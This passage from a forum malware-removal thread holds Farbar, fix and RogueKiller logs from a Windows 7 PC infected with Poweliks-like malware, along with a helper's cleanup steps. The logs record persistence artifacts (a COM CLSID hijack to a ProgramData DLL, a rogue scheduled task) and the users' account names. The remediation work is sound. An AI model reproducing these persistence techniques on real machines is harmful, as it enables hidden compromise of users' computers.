CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll (Microsoft Corporation)

==================== Restore Points  =========================

03-11-2014 03:01:09 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {128D76C8-7028-468B-977E-C90117E68814} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {3304AF05-A723-4069-A962-EAD84FAC017E} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {90409AC3-C03C-4F43-B367-6CDE097B0ADB} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {96E7D4EB-E47C-4C6B-9C36-79FB1D4DA37C} - System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D} => C:\Windows\system32\bdhpl.dll/s "C:\Windows\system32\bdhpl.dll"
Task: {A653F635-2846-46C9-9F0D-D61FF57E3FBF} - System32\Tasks\TVT\ChangePWD => %RR%\rrcmd.exe
Task: {D50DCB71-264E-42D1-ADAA-9ABF4048AADA} - System32\Tasks\TVT\LaunchRnR => %RR%\rrcmd.exe
Task: {D854CD5A-DB3B-41A2-9D10-C6B6BFFECB0F} - System32\Tasks\TVT\UpdateRnR => %TVTCOMMON%\Scheduler\tvtsetsched.exe
Task: {F97F77C6-5696-408F-89F1-17A24D6C26F6} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2010-07-28] (Lenovo Group Limited)
Task: {FCCB621B-E6E2-41C3-B70A-323C5506BF37} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

==================== Loaded Modules (whitelisted) =============

2012-02-12 01:03 - 2005-03-12 01:07 - 00087040 ____N () C:\Windows\System32\pdfcmnnt.dll
2012-02-12 12:43 - 2010-03-03 09:45 - 00053248 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
2011-11-26 19:50 - 2010-04-22 01:20 - 00177152 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
2014-08-11 11:49 - 2014-08-11 11:49 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
2013-09-23 08:34 - 2014-08-26 02:46 - 02640408 _____ () C:\Program Files (x86)\AVG Secure Search\vprot.exe
2011-11-26 19:50 - 2010-07-27 12:04 - 00029184 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-11-26 19:50 - 2008-11-27 03:16 - 00018432 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
2011-11-26 19:50 - 2010-06-01 22:37 - 00228352 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
2009-05-28 01:09 - 2009-05-28 01:09 - 00049976 ____N () C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
2012-02-28 11:20 - 2011-12-22 23:08 - 00051848 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CodeLog.dll
2012-02-28 11:20 - 2008-11-25 17:18 - 01291264 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\libxml2.dll
2012-02-28 11:20 - 2004-10-05 03:08 - 00055808 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\zlib1.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00114312 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExchBackupSize.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00245896 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExImage.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00069768 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumTapeDevice.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00064648 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbTapeBrowse.dll
2012-02-28 11:20 - 2011-12-23 15:15 - 00023176 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AccountManager.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00093832 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBFireWall.dll
2011-11-26 19:46 - 2009-07-15 20:20 - 00077824 ____N () C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2014-08-11 11:49 - 2014-08-11 11:49 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2012-02-12 12:44 - 2012-02-12 12:44 - 00315392 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANPDApi.dll
2012-02-12 12:43 - 2010-03-19 19:14 - 00294912 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\WlanApp.dll
2013-12-09 13:21 - 2014-03-21 08:19 - 01603608 _____ () C:\Program Files (x86)\AVG Secure Search\TBAPI.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-606911418-3109034106-3922174115-500 - Administrator - Enabled) => C:\Users\Administrator
Brenda (S-1-5-21-606911418-3109034106-3922174115-1001 - Limited - Enabled) => C:\Users\Brenda
Deborah (S-1-5-21-606911418-3109034106-3922174115-1000 - Administrator - Enabled) => C:\Users\Deborah
Diana (S-1-5-21-606911418-3109034106-3922174115-1053 - Administrator - Enabled)
Guest (S-1-5-21-606911418-3109034106-3922174115-501 - Limited - Disabled)
Nancy (S-1-5-21-606911418-3109034106-3922174115-1002 - Limited - Enabled)

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (11/02/2014 07:54:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 04:01:11 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (7444) Asapi: (16:01:11:9740)(7444) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: jscript9.dll, version: 11.0.9600.17344, time stamp: 0x541b85e6
Exception code: 0xc0000005
Fault offset: 0x00127417
Faulting process id: 0x25a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x3580
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x0034cf7e
Faulting process id: 0x1388
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2d2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x19ec
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:17:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x35f0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:08:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x25c8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 09:48:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x27f8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

System errors:
=============
Error: (11/02/2014 07:54:59 PM) (Source: VDS Basic Provider) (EventID: 1) (User: )
Description: Unexpected failure. Error code: D@01010004

Error: (11/02/2014 07:54:59 PM) (Source: VDS Basic Provider) (EventID: 1) (User: )
Description: Unexpected failure. Error code: D@01010004

Error: (11/02/2014 07:52:00 PM) (Source: volsnap) (EventID: 36) (User: )
Description: The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.

Error: (11/02/2014 03:13:02 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/02/2014 02:14:16 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (11/02/2014 10:51:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:51:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:51 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:51 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:31 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Microsoft Office Sessions:
=========================
Error: (11/02/2014 07:54:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 04:01:11 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (7444) Asapi: (16:01:11:9740)(7444) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7jscript9.dll11.0.9600.17344541b85e6c00000050012741725a001cff6ba0e99d2f5C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll238b432a-62ae-11e4-bdb2-50e549719966

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf358001cff6928245fff6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll4bec0c79-6286-11e4-bdb2-50e549719966

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0034cf7e138801cff6512a52db7fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll939db79e-6244-11e4-bdb2-50e549719966

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947652d2c01cff64c0f49d66cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll6afddfed-6240-11e4-bdb2-50e549719966

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476519ec01cff64be81db19bC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll57cde7a4-623f-11e4-bdb2-50e549719966

Error: (11/01/2014 10:17:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476535f001cff64b5e350963C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlld42ce66d-623e-11e4-bdb2-50e549719966

Error: (11/01/2014 10:08:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf25c801cff64a1ba4cb84C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll89126c6e-623d-11e4-bdb2-50e549719966

Error: (11/01/2014 09:48:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf27f801cff6475c4151c6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllc8feb523-623a-11e4-bdb2-50e549719966

==================== Memory info ===========================

Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 62%
Total physical RAM: 3551.17 MB
Available physical RAM: 1339.93 MB
Total Pagefile: 7100.52 MB
Available Pagefile: 4992.36 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:221.95 GB) (Free:104.09 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:2.1 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: B2D7266B)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=221.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#8 shelf life

shelf life

  • Malware Response Team
  • 2,651 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:10:07 PM

Posted 03 November 2014 - 05:31 PM

Hi,

ok. thanks for the info.  We will use FRST once more like before.

Copy/paste whats below into notepad, save as fixlist.txt in same directory as FRST is in. Start FRST and click the fix button. Post the log in your reply.

C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D}
C:\Windows\system32\qzmktxy.dll
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}

How Can I Reduce My Risk to Malware?


#9 dazedandconfused21

dazedandconfused21
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:07 PM

Posted 03 November 2014 - 06:50 PM

Good evening,

Here is the fixlog:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-03 18:46:06 Run:2
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D}
C:\Windows\system32\qzmktxy.dll
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
*****************

C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D} => Moved successfully.
C:\Windows\system32\qzmktxy.dll => Moved successfully.

"C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}" directory move:

Could not move "C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\8afc49b02429a" => Scheduled to move on reboot.
Could not move "C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\mgqqsui.tmp" => Scheduled to move on reboot.
Could not move "C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll" => Scheduled to move on reboot.
Could not move "C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}" directory. => Scheduled to move on reboot.

=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-11-03 18:49:48)<=

C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\8afc49b02429a => Is moved successfully.
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\mgqqsui.tmp => Is moved successfully.
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll => Is moved successfully.
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8} => Is moved successfully.

==== End of Fixlog ====



#10 shelf life

shelf life

  • Malware Response Team
  • 2,651 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:10:07 PM

Posted 03 November 2014 - 08:46 PM

Hi,

 

Thanks for the info. Lets get one more download while we are at it just to make sure it all looks good.

 

Please download RogueKiller.exe and save to the desktop:

 

    http://www.bleepingcomputer.com/download/roguekiller/

    Close all windows and browsers
    Right-click the program and select 'Run as Admin'
    A prescan will start automatically.
    Once the prescan is done click on the Scan button
    When done press the Report button.
    Please copy and past the results in your next reply.
    File>Exit to quit RogueKiller.
    Please dont delete anything just yet, not everything listed is malware.


How Can I Reduce My Risk to Malware?


#11 dazedandconfused21

dazedandconfused21
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:07 PM

Posted 03 November 2014 - 09:15 PM

Thank you. here is roguekiller log:

 

RogueKiller V10.0.4.0 [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Deborah [Administrator]
Mode : Scan -- Date : 11/03/2014  21:15:24

¤¤¤ Processes : 1 ¤¤¤
[PUP] (SVC) vToolbarUpdater18.1.9 -- C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe[7] -> Stopped

¤¤¤ Registry : 19 ¤¤¤
[PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | vProt : "C:\Program Files (x86)\AVG Secure Search\vprot.exe"  -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST3250318AS ATA Device +++++
--- User ---
[MBR] ba1a3232ec89787f10919ba57328124e
[BSP] fe60953779c108c83b83ccd2d5a74b27 : Lenovo MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1200 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2459648 | Size: 227272 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 467914752 | Size: 10000 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: HP Officejet 6500 E USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )



#12 shelf life

shelf life

  • Malware Response Team
  • 2,651 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:10:07 PM

Posted 04 November 2014 - 06:22 PM

Ok thanks for the info.Dont see much to worry about in that log. If all is good on your end you can get one more download that will delete all the tools we used then delete itself:

 

    Please download Delfix.exe by Xplode and save it to your desktop:
    https://toolslib.net/downloads/viewdownload/2-delfix/
    Please start it and check the box next to "Remove disinfection tools" and click on the run button.
    The tool will delete itself once it finishes.

 

Happy Safe Surfing out there.


How Can I Reduce My Risk to Malware?


#13 dazedandconfused21

dazedandconfused21
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:07 PM

Posted 04 November 2014 - 07:55 PM

Actually while waiting for further instructions, the PC looks as though the Trojan reinstalled itself. I am getting fffsee.com blocking in MalwareBytes continuously now and there are many instances of dllhost*32 again in task manager. We have not used this PC yet since we were working with you to remove this vicious virus. Please advise what I can provide you for diags?



#14 shelf life

shelf life

  • Malware Response Team
  • 2,651 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:10:07 PM

Posted 04 November 2014 - 10:04 PM

Ok well I guess we were not quite done yet. This malware is pretty new on the scene and new in other ways also. Havent had the chance to experience it on my malware machine yet.

 

 

We have not used this PC yet

Good, dont use it other than to download tools or run the scans. When its not in use make sure it has no network connectvity or power it off.

The best thing to do would be to start over with the logs again. There will be one new download to get.

 

So:

 

1) Run FRST again like you did before- but before hitting the scan button put a checkmark next to addition.txt (under Optional Scan) and then click the scan button. Please post the new logs which you can find in the same dir.as  FRST is in: C:\Users\Deborah\Downloads

 

This is the new download;

 

    2) Please download Adwcleaner.exe to your desktop.
    Right click on AdwCleaner.exe, select "run as admin"
    Click on the Scan button
    Once the scan is done click on the Delete button
    Copy and paste the contents of the log file in your reply
    You can also find the logfile at C:\AdwCleaner[R1].txt as well
    Exit AdwCleaner with the X (close) button. click ok at the final prompt.

 

 

3) Please download RogueKiller.exe and save to the desktop:

 

    http://www.bleepingcomputer.com/download/roguekiller/

    Close all windows and browsers
    Right-click the program and select 'Run as Admin'
    A prescan will start automatically.
    Once the prescan is done click on the Scan button
    When done press the Report button.
    Please copy and past the results in your next reply.
    File>Exit to quit RogueKiller.
    Please dont delete anything just yet, not everything listed is malware.

 

Lets start with those three tools for now and see what we have going on.

 

I will not be back on line so wont be able to reply for 16-18hrs or so.

 

 


How Can I Reduce My Risk to Malware?


#15 dazedandconfused21

dazedandconfused21
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:07 PM

Posted 05 November 2014 - 11:00 AM

Thank you. here are the logs. this PC is now alerting that AVG is blocking Poweliks, and we now have a second PC with this same issue.


Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Deborah (administrator) on ASSISTANT on 05-11-2014 10:40:13
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

